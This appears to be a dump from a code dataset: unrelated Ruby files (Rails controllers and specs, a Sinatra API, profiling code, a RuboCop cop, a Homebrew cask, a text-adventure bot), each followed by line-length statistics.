if BLESSED_BUNDLER_VERSIONS.key?(major)
@version = BLESSED_BUNDLER_VERSIONS[major]
else
raise UnsupportedBundlerVersion.new(BLESSED_BUNDLER_VERSIONS, major)
end
end
def bundler_version_escape_valve!
topic("Removing BUNDLED WITH version in the Gemfile.lock")
contents = File.read("Gemfile.lock")
File.open("Gemfile.lock", "w") do |f|
f.write contents.sub(/^BUNDLED WITH$(\r?\n) (?<major>\d+)\.\d+\.\d+/m, '')
end
end
end
| 30.53211 | 122 | 0.656851 |
f87788ba9ccb5f0c260747f9bf9de8f98b0ed2f4 | 40 | module Johannes
VERSION = "0.0.1"
end
| 10 | 19 | 0.675 |
abea672c525e7a76af8e53130d1bff76ec21cca2 | 3,326 | require 'pry'
module Handlers
class Dungeon
include PoroPlus
include Behavior::HandlesCommands
def move
if Place.current.has_exit?(movement_direction)
response = "#{message.sender_nick} dazedly leads the party #{movement_direction}.\n\r" if message.sender.dazed?
response = "#{message.sender_nick} staggers #{movement_direction}.\n\r" if message.sender.drunk?
response = "#{message.sender_nick} leads the party (hopefully) #{movement_direction}.\n\r" if message.sender.disoriented?
response ||= ""
response << Place.go(movement_direction)
else
response = "You can't go that way!"
end
message.response = response
end
def look
if subject = command.subject
Alice::Util::Logger.info "*** Look subject is \"#{command.subject}\""
response = look_in_direction(looking_direction) if looking_direction.present?
response = describe_setting(subject) if Place.current.description =~ /#{subject}/i
response ||= subject.describe if subject.is_a? User
response ||= extant_object(subject).try(:describe)
end
if command.predicate == "look" && command_string.fragment == ""
response = Place.current.describe
end
response ||= extant_object(command_string.fragment).try(:describe)
response ||= extant_object(command.predicate).try(:describe)
response ||= "I don't see that here."
message.response = response
end
def map
message.response = "You can find an up-to-date map of the dungeon at #{ENV['MAP_URL']}. Your current location is highlighted in red. Be sure to mouse over the rooms!"
end
def xyzzy
room = Place.all.sample
Place.set_current_room(room)
response = "Everything spins around!\n\r"
response << room.describe
message.response = response
end
def attack
if command.subject =~ /darkness/ && Place.current.is_dark?
message.response = "You attack the darkness! A voice to the east whines, 'Where is the Mountain Dew?'"
elsif command.subject =~ /gazebo/# && Place.current.description =~ /gazebo/
response = "The dread gazebo kills you all!\n\r"
response << reset_maze
message.response = response
else
message.response = Util::Randomizer.attack
end
end
private
def describe_setting(aspect)
return unless aspect.present?
Util::Randomizer.item_description(aspect)
end
def looking_direction
@look_direction ||= ::Dungeon.direction_from(command.predicate)
end
def look_in_direction(direction)
if Place.current.has_exit?(direction)
response = Place.place_to(direction, party_moving=false, create_place=true).view_from_afar
else
response = "A lovely wall you've found there."
end
end
def movement_direction
@movement_direction ||= ::Dungeon.direction_from(command_string.verb)
end
def extant_object(name)
return if name.empty?
if actor = ::Actor.from(name)
actor = Place.current.actors.include?(actor) ? actor : nil
end
(::User.from(name) || ::Item.from(name) || ::Beverage.from(name) || actor)
end
def reset_maze
message.response = ::Dungeon.reset!
end
end
end
| 32.930693 | 172 | 0.659651 |
03363ba5abb924518886ceb7243a96829efbf2fd | 152 | module ActivePresenter
module VERSION
MAJOR = 0
MINOR = 0
TINY = 3
STRING = [MAJOR, MINOR, TINY].join('.')
end
end
| 15.2 | 45 | 0.532895 |
e87e3244c907207ce5ad6a2461046a447b2f54eb | 959 | require "rails_helper"
RSpec.describe EventsController, type: :routing do
describe "routing" do
it "routes to #index" do
expect(get: "/events").to route_to("events#index")
end
it "routes to #new" do
expect(get: "/events/new").to route_to("events#new")
end
it "routes to #show" do
expect(get: "/events/1").to route_to("events#show", id: "1")
end
it "routes to #edit" do
expect(get: "/events/1/edit").to route_to("events#edit", id: "1")
end
it "routes to #create" do
expect(post: "/events").to route_to("events#create")
end
it "routes to #update via PUT" do
expect(put: "/events/1").to route_to("events#update", id: "1")
end
it "routes to #update via PATCH" do
expect(patch: "/events/1").to route_to("events#update", id: "1")
end
it "routes to #destroy" do
expect(delete: "/events/1").to route_to("events#destroy", id: "1")
end
end
end
| 24.589744 | 72 | 0.605839 |
089e94f672af453c5e989907fad7ec98b0e7c431 | 458 | module ItemDecoratorCommon
extend ActiveSupport::Concern
included do
def to_values
model.class::DIFF_FIELDS.inject({}) do |hash, field|
hash[field] = case field
when :url
h.link_to(send(:url).truncate(30), send(:url), target: "_blank")
when :tombo_image
h.annict_image_tag(self, :tombo_image, size: "200x200")
else
send(field)
end
hash
end
end
end
end
| 21.809524 | 74 | 0.58952 |
38521d19bb029f434425ec28cda26a92b8ab5768 | 464 | Refinery::Application.routes.draw do
resources :pages
scope(:path => 'refinery', :as => 'admin', :module => 'admin') do
resources :pages do
collection do
post :update_positions
end
end
resources :page_parts
resource :pages do
resources :dialogs, :controller => :pages_dialogs do
collection do
get :link_to
get :test_url
get :test_email
end
end
end
end
end
| 18.56 | 67 | 0.586207 |
f7db83c456515fb924a40ec12cb06d05b169f5bd | 339 | require_relative 'account'
require_relative 'portfolio'
portfolio = Portfolio.new
portfolio.add_account Account.new('red', 2000)
portfolio.add_account Account.new('blue', 1000)
portfolio.add_account Account.new('green', 500)
puts portfolio.any? { |account| account.balance > 2000 }
puts portfolio.all? { |account| account.balance >= 10 } | 33.9 | 56 | 0.772861 |
1d3b4863491d174f040610aa111fc41a3b5bef02 | 802 | require 'sinatra'
require 'rubygems'
require 'aws-record'
require_relative "models/landpage_lead.rb"
require_relative "controllers/landpage_lead_controller.rb"
before do
if (! request.body.read.empty? and request.body.size > 0)
request.body.rewind
@params = Sinatra::IndifferentHash.new
@params.merge!(JSON.parse(request.body.read))
end
end
##################################
# For the index page
##################################
get '/' do
erb :index
end
get '/landpage' do
erb :landpage
end
##################################
# For the API
##################################
get '/api/lead' do
content_type :json
items = LandpageLeadController.list
end
post '/api/lead' do
content_type :json
item = LandpageLeadController.create(params)
item.to_h.to_json
end
| 18.651163 | 59 | 0.607232 |
e93f16da641b5a29ecfe622245d68d1ee2787caa | 3,027 | require 'ddtrace/ext/profiling'
require 'ddtrace/profiling/events/stack'
require 'ddtrace/profiling/pprof/builder'
require 'ddtrace/profiling/pprof/converter'
module Datadog
module Profiling
module Pprof
# Builds a profile from a StackSample
class StackSample < Converter
SAMPLE_TYPES = {
cpu_time_ns: [
Datadog::Ext::Profiling::Pprof::VALUE_TYPE_CPU,
Datadog::Ext::Profiling::Pprof::VALUE_UNIT_NANOSECONDS
],
wall_time_ns: [
Datadog::Ext::Profiling::Pprof::VALUE_TYPE_WALL,
Datadog::Ext::Profiling::Pprof::VALUE_UNIT_NANOSECONDS
]
}.freeze
def self.sample_value_types
SAMPLE_TYPES
end
def add_events!(stack_samples)
new_samples = build_samples(stack_samples)
builder.samples.concat(new_samples)
end
def stack_sample_group_key(stack_sample)
stack_sample.hash
end
def build_samples(stack_samples)
groups = group_events(stack_samples, &method(:stack_sample_group_key))
groups.collect do |_group_key, group|
build_sample(group.sample, group.values)
end
end
def build_sample(stack_sample, values)
locations = builder.build_locations(
stack_sample.frames,
stack_sample.total_frame_count
)
Perftools::Profiles::Sample.new(
location_id: locations.collect(&:id),
value: values,
label: build_sample_labels(stack_sample)
)
end
def build_sample_values(stack_sample)
no_value = Datadog::Ext::Profiling::Pprof::SAMPLE_VALUE_NO_VALUE
values = super(stack_sample)
values[sample_value_index(:cpu_time_ns)] = stack_sample.cpu_time_interval_ns || no_value
values[sample_value_index(:wall_time_ns)] = stack_sample.wall_time_interval_ns || no_value
values
end
def build_sample_labels(stack_sample)
labels = [
Perftools::Profiles::Label.new(
key: builder.string_table.fetch(Datadog::Ext::Profiling::Pprof::LABEL_KEY_THREAD_ID),
str: builder.string_table.fetch(stack_sample.thread_id.to_s)
)
]
unless stack_sample.trace_id.nil? || stack_sample.trace_id.zero?
labels << Perftools::Profiles::Label.new(
key: builder.string_table.fetch(Datadog::Ext::Profiling::Pprof::LABEL_KEY_TRACE_ID),
str: builder.string_table.fetch(stack_sample.trace_id.to_s)
)
end
unless stack_sample.span_id.nil? || stack_sample.span_id.zero?
labels << Perftools::Profiles::Label.new(
key: builder.string_table.fetch(Datadog::Ext::Profiling::Pprof::LABEL_KEY_SPAN_ID),
str: builder.string_table.fetch(stack_sample.span_id.to_s)
)
end
labels
end
end
end
end
end
| 33.263736 | 100 | 0.625041 |
38825eaa71b1492442dfb722b204181330d408be | 1,740 | ##########################################################################
# Copyright 2015 ThoughtWorks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
require 'spec_helper'
describe ApiV2::AgentsRepresenter do
include AgentMother
it 'renders all agents with hal representation' do
idle_agent = idle_agent(
hostname: 'Agent01',
location: '/var/lib/go-server',
uuid: 'some-uuid',
space: 10.gigabytes,
operating_system: 'Linux',
ip_address: '127.0.0.1',
resources: 'linux,firefox',
environments: ['uat', 'load_test']
)
presenter = ApiV2::AgentsRepresenter.new([idle_agent])
actual_json = presenter.to_hash(url_builder: UrlBuilder.new)
expect(actual_json).to have_links(:self, :doc)
expect(actual_json).to have_link(:self).with_url('http://test.host/api/agents')
expect(actual_json).to have_link(:doc).with_url('http://api.go.cd/#agents')
actual_json.delete(:_links)
actual_json.fetch(:_embedded).should == { :agents => [ApiV2::AgentRepresenter.new(idle_agent).to_hash(url_builder: UrlBuilder.new)] }
end
end
| 39.545455 | 137 | 0.631609 |
1a067e23c2ac32437668a7361d1ed4c48c33813f | 1,262 | cask 'mps' do
version '2017.3,173.1427'
sha256 'f2db828314488712f27143c0688680b7b1829f72bc6d40a3a3eb9606b6e49aa2'
url "https://download.jetbrains.com/mps/#{version.before_comma.major_minor}/MPS-#{version.before_comma}-macos-jdk-bundled.dmg"
appcast 'https://data.services.jetbrains.com/products/releases?code=MPS&latest=true&type=release',
checkpoint: '9a6768c634431dfab713bd8ae2adfb21b4563a6813eedf1ebca3c4022c1ab661'
name 'JetBrains MPS'
homepage 'https://www.jetbrains.com/mps/'
auto_updates true
app "MPS #{version.major_minor}.app"
uninstall_postflight do
ENV['PATH'].split(File::PATH_SEPARATOR).map { |path| File.join(path, 'mps') }.each { |path| File.delete(path) if File.exist?(path) && File.readlines(path).grep(%r{# see com.intellij.idea.SocketLock for the server side of this interface}).any? }
end
zap trash: [
"~/MPSSamples.#{version.before_comma.major_minor}",
"~/Library/Application Support/MPS#{version.before_comma.major_minor}",
"~/Library/Caches/MPS#{version.before_comma.major_minor}",
"~/Library/Logs/MPS#{version.before_comma.major_minor}",
"~/Library/Preferences/MPS#{version.before_comma.major_minor}",
]
end
| 46.740741 | 248 | 0.706022 |
91fb10b5836b5dcb57d91f718a308db7885d381e | 529 | shared_context "configurator with stub builder and requester" do
let(:configurator) { HttpStub::Examples::ConfiguratorWithComprehensiveStubs }
let(:stub_builder) { configurator.stub_builder }
let(:stub_requester) { HttpStub::StubRequester.new(server_uri, stub_builder) }
let(:stub_match_rules) { stub_builder.match_rules }
let(:stub_response) { stub_builder.response }
let(:expected_match_response) { stub_requester.expected_response }
let(:stub_request) { stub_requester.last_request }
end
| 35.266667 | 80 | 0.758034 |
2857f95b015b0bd8a53cbe001372c570e1d6fa58 | 2,458 | =begin
#Hydrogen Atom API
#The Hydrogen Atom API
OpenAPI spec version: 1.7.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.14
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for NucleusApi::PageAllocation
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'PageAllocation' do
before do
# run before each test
@instance = NucleusApi::PageAllocation.new
end
after do
# run after each test
end
describe 'test an instance of PageAllocation' do
it 'should create an instance of PageAllocation' do
expect(@instance).to be_instance_of(NucleusApi::PageAllocation)
end
end
describe 'test attribute "content"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "first"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "last"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "number"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "number_of_elements"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "size"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "sort"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "total_elements"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "total_pages"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 27.311111 | 102 | 0.715216 |
79663ce3a940979f69935faf7e2c004a797a10e8 | 2,819 | # frozen_string_literal: true
module RuboCop
module Cop
module Gemspec
# Dependencies in the gemspec should be alphabetically sorted.
#
# @example
# # bad
# spec.add_dependency 'rubocop'
# spec.add_dependency 'rspec'
#
# # good
# spec.add_dependency 'rspec'
# spec.add_dependency 'rubocop'
#
# # good
# spec.add_dependency 'rubocop'
#
# spec.add_dependency 'rspec'
#
# # bad
# spec.add_development_dependency 'rubocop'
# spec.add_development_dependency 'rspec'
#
# # good
# spec.add_development_dependency 'rspec'
# spec.add_development_dependency 'rubocop'
#
# # good
# spec.add_development_dependency 'rubocop'
#
# spec.add_development_dependency 'rspec'
#
# # bad
# spec.add_runtime_dependency 'rubocop'
# spec.add_runtime_dependency 'rspec'
#
# # good
# spec.add_runtime_dependency 'rspec'
# spec.add_runtime_dependency 'rubocop'
#
# # good
# spec.add_runtime_dependency 'rubocop'
#
# spec.add_runtime_dependency 'rspec'
#
# # good only if TreatCommentsAsGroupSeparators is true
# # For code quality
# spec.add_dependency 'rubocop'
# # For tests
# spec.add_dependency 'rspec'
class OrderedDependencies < Base
extend AutoCorrector
include OrderedGemNode
MSG = 'Dependencies should be sorted in an alphabetical order within ' \
'their section of the gemspec. ' \
'Dependency `%<previous>s` should appear before `%<current>s`.'
def on_new_investigation
return if processed_source.blank?
dependency_declarations(processed_source.ast)
.each_cons(2) do |previous, current|
next unless consecutive_lines(previous, current)
next unless case_insensitive_out_of_order?(gem_name(current), gem_name(previous))
next unless get_dependency_name(previous) == get_dependency_name(current)
register_offense(previous, current)
end
end
private
def previous_declaration(node)
declarations = dependency_declarations(processed_source.ast)
node_index = declarations.find_index(node)
declarations.to_a[node_index - 1]
end
def get_dependency_name(node)
node.method_name
end
# @!method dependency_declarations(node)
def_node_search :dependency_declarations, <<~PATTERN
(send (lvar _) {:add_dependency :add_runtime_dependency :add_development_dependency} (str _) ...)
PATTERN
end
end
end
end
| 29.989362 | 107 | 0.608726 |
915a7ed103a3d32a59a78ce5ea00c4e5eb00993d | 99 | module ParamsValidation
EmailRegex = /\A[a-zA-Z0-9_.+\-]+@[a-zA-Z0-9\-]+\.[a-zA-Z0-9\-.]+\z/
end
| 24.75 | 70 | 0.565657 |
1a166dfa82e2fd1c929f4ae1875c8392e841e1bf | 364 | class CreateUserAddresses < ActiveRecord::Migration[6.1]
def change
create_table :user_addresses do |t|
t.references :user, type: :bigint
t.string :fullname
t.string :address_line1
t.string :address_line2
t.string :city
t.string :state
t.string :zip_code
t.string :country
t.timestamps
end
end
end
| 22.75 | 56 | 0.651099 |
180520b27e7facb1d9d91bd27bf316a9ff67aadb | 564 | # frozen_string_literal: true
require 'spec_helper'
describe Gitlab::Cluster::PumaWorkerKillerObserver do
let(:counter) { Gitlab::Metrics::NullMetric.instance }
before do
allow(Gitlab::Metrics).to receive(:counter)
.with(any_args)
.and_return(counter)
end
describe '#callback' do
subject { described_class.new }
it 'increments timeout counter' do
worker = double(index: 0)
expect(counter)
.to receive(:increment)
.with({ worker: 'worker_0' })
subject.callback.call(worker)
end
end
end
| 20.142857 | 56 | 0.66844 |
f86f5212f149b7ec04e99ef8e680e44e0d606731 | 597 | class Documentaries
attr_accessor :rating, :year_made, :title, :movie_url
@@all = []
def initialize(rating, year_made, title, movie_url)
@rating = rating
@year_made = year_made
@title = title
@movie_url = movie_url
@@all << self
end
def self.reset!
@@all = []
end
def self.all
@@all
end
def self.movies_made_after(year)
#return all docs made after year_made
list = self.all.find_all {|m| m.year_made.to_i > year}
list.each.with_index(1) {|m, i| puts "#{i}. #{m.title} -- #{m.year_made} \n\t #{m.movie_url}" }
end
end
| 21.321429 | 99 | 0.609715 |
5d2765532ffeaa099ccc4f0e8007ae91076cabac | 5,761 | require 'helper'
describe Twitter::REST::Undocumented do
before do
@client = Twitter::REST::Client.new(consumer_key: 'CK', consumer_secret: 'CS', access_token: 'AT', access_token_secret: 'AS')
end
describe '#following_followers_of' do
context 'with a screen_name passed' do
before do
stub_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '-1'}).to_return(body: fixture('users_list.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of('sferik')
expect(a_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '-1'})).to have_been_made
end
it 'returns an array of numeric IDs for every user following the specified user' do
following_followers_of = @client.following_followers_of('sferik')
expect(following_followers_of).to be_a Twitter::Cursor
expect(following_followers_of.first).to be_a Twitter::User
end
context 'with each' do
before do
stub_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '1322801608223717003'}).to_return(body: fixture('users_list2.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of('sferik').each {}
expect(a_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '-1'})).to have_been_made
expect(a_get('/users/following_followers_of.json').with(query: {screen_name: 'sferik', cursor: '1322801608223717003'})).to have_been_made
end
end
end
context 'with a user ID passed' do
before do
stub_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'}).to_return(body: fixture('users_list.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of(7_505_382)
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'})).to have_been_made
end
context 'with each' do
before do
stub_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '1322801608223717003'}).to_return(body: fixture('users_list2.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of(7_505_382).each {}
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'})).to have_been_made
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '1322801608223717003'})).to have_been_made
end
end
end
context 'without arguments passed' do
before do
stub_get('/1.1/account/verify_credentials.json').with(query: {skip_status: 'true'}).to_return(body: fixture('sferik.json'), headers: {content_type: 'application/json; charset=utf-8'})
stub_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'}).to_return(body: fixture('users_list.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of
expect(a_get('/1.1/account/verify_credentials.json').with(query: {skip_status: 'true'})).to have_been_made
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'})).to have_been_made
end
it 'returns an array of numeric IDs for every user following the specified user' do
following_followers_of = @client.following_followers_of
expect(following_followers_of).to be_a Twitter::Cursor
expect(following_followers_of.first).to be_a Twitter::User
end
context 'with each' do
before do
stub_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '1322801608223717003'}).to_return(body: fixture('users_list2.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.following_followers_of.each {}
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '-1'})).to have_been_made
expect(a_get('/users/following_followers_of.json').with(query: {user_id: '7505382', cursor: '1322801608223717003'})).to have_been_made
end
end
end
end
describe '#tweet_count' do
before do
stub_request(:get, 'https://cdn.api.twitter.com/1/urls/count.json').with(query: {url: 'http://twitter.com'}).to_return(body: fixture('count.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.tweet_count('http://twitter.com')
expect(a_request(:get, 'https://cdn.api.twitter.com/1/urls/count.json').with(query: {url: 'http://twitter.com'})).to have_been_made
end
it 'returns a Tweet count' do
tweet_count = @client.tweet_count('http://twitter.com')
expect(tweet_count).to be_an Integer
expect(tweet_count).to eq(13_845_465)
end
context 'with a URI' do
it 'requests the correct resource' do
uri = URI.parse('http://twitter.com')
@client.tweet_count(uri)
expect(a_request(:get, 'https://cdn.api.twitter.com/1/urls/count.json').with(query: {url: 'http://twitter.com'})).to have_been_made
end
end
end
end
| 55.394231 | 229 | 0.685645 |
26e7e93533ef84b995c1a23e8696ac87b64cf1f8 | 3,562 | class Profiles::TwoFactorAuthsController < Profiles::ApplicationController
skip_before_action :check_2fa_requirement
def show
unless current_user.otp_secret
current_user.otp_secret = User.generate_otp_secret(32)
end
unless current_user.otp_grace_period_started_at && two_factor_grace_period
current_user.otp_grace_period_started_at = Time.current
end
current_user.save! if current_user.changed?
if two_factor_authentication_required? && !current_user.two_factor_enabled?
if two_factor_grace_period_expired?
flash.now[:alert] = 'You must enable Two-Factor Authentication for your account.'
else
grace_period_deadline = current_user.otp_grace_period_started_at + two_factor_grace_period.hours
flash.now[:alert] = "You must enable Two-Factor Authentication for your account before #{l(grace_period_deadline)}."
end
end
@qr_code = build_qr_code
@account_string = account_string
setup_u2f_registration
end
def create
if current_user.validate_and_consume_otp!(params[:pin_code])
current_user.otp_required_for_login = true
@codes = current_user.generate_otp_backup_codes!
current_user.save!
render 'create'
else
@error = 'Invalid pin code'
@qr_code = build_qr_code
setup_u2f_registration
render 'show'
end
end
# A U2F (universal 2nd factor) device's information is stored after successful
# registration, which is then used while 2FA authentication is taking place.
def create_u2f
@u2f_registration = U2fRegistration.register(current_user, u2f_app_id, u2f_registration_params, session[:challenges])
if @u2f_registration.persisted?
session.delete(:challenges)
redirect_to profile_two_factor_auth_path, notice: "Your U2F device was registered!"
else
@qr_code = build_qr_code
setup_u2f_registration
render :show
end
end
def codes
@codes = current_user.generate_otp_backup_codes!
current_user.save!
end
def destroy
current_user.disable_two_factor!
redirect_to profile_account_path
end
def skip
if two_factor_grace_period_expired?
redirect_to new_profile_two_factor_auth_path, alert: 'Cannot skip two factor authentication setup'
else
session[:skip_tfa] = current_user.otp_grace_period_started_at + two_factor_grace_period.hours
redirect_to root_path
end
end
private
def build_qr_code
uri = current_user.otp_provisioning_uri(account_string, issuer: issuer_host)
RQRCode.render_qrcode(uri, :svg, level: :m, unit: 3)
end
def account_string
"#{issuer_host}:#{current_user.email}"
end
def issuer_host
Gitlab.config.gitlab.host
end
# Setup in preparation of communication with a U2F (universal 2nd factor) device
# Actual communication is performed using a Javascript API
def setup_u2f_registration
@u2f_registration ||= U2fRegistration.new
@u2f_registrations = current_user.u2f_registrations
u2f = U2F::U2F.new(u2f_app_id)
registration_requests = u2f.registration_requests
sign_requests = u2f.authentication_requests(@u2f_registrations.map(&:key_handle))
session[:challenges] = registration_requests.map(&:challenge)
gon.push(u2f: { challenges: session[:challenges], app_id: u2f_app_id,
register_requests: registration_requests,
sign_requests: sign_requests })
end
def u2f_registration_params
params.require(:u2f_registration).permit(:device_response, :name)
end
end
| 31.245614 | 124 | 0.744526 |
1a267eeb566504d47bb94390fbce9ced29290736 | 506 | # frozen_string_literal: true
require "rspec"
require "rack/test"
require "rack/ecg"
RSpec.configure do |config|
config.expect_with(:rspec) do |expectations|
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
config.mock_with(:rspec) do |mocks|
mocks.verify_partial_doubles = true
end
config.disable_monkey_patching!
config.warnings = true
config.include(Rack::Test::Methods)
def json_body
@json_body ||= JSON.parse(last_response.body)
end
end
| 20.24 | 76 | 0.758893 |
ed9b2974fc11c9684af87c70a3836addce60f3c5 | 531 | require 'csv'
# file = File.open('db/urls', 'r')
# file.each_line do |row|
# puts row
# endinserts = []
inserts= []
file = File.open('db/urls', 'r')
file.each do |row|
# row = (http://example.com/fb3b726804f824a9185c57530e),
#
inserts << "('#{row.chomp.tr(',();', '')}', '#{SecureRandom.hex(8)}', 0, '#{Time.now}', '#{Time.now}' )"
# ('www.google.com', 'adsfqwer', 0)
end
sql = "INSERT INTO urls (long_url, short_url, click_count, created_at, updated_at) VALUES " + inserts.join(', ')
Url.connection.execute sql | 35.4 | 112 | 0.608286 |
f74c86c68999688c1736c18f76f5729602911b4d | 597 | require 'test_helper'
class ProtectedAreasHelperTest < ActionView::TestCase
test '#map_bounds, given a ProtectedArea object, returns a hash containing
its bounds' do
pa = FactoryGirl.create(:protected_area)
pa.expects(:bounds).twice.returns([[0,0], [1,1]])
assert_equal map_bounds(pa), {'from' => [0,0], 'to' => [1,1]}
end
test '#map_bounds, given no arguments, returns a hash containing
the default bounds' do
Rails.application.secrets.default_map_bounds = {'from' => [1,1], 'to' => [1,2]}
assert_equal map_bounds, {'from' => [1,1], 'to' => [1,2]}
end
end
| 29.85 | 84 | 0.664992 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.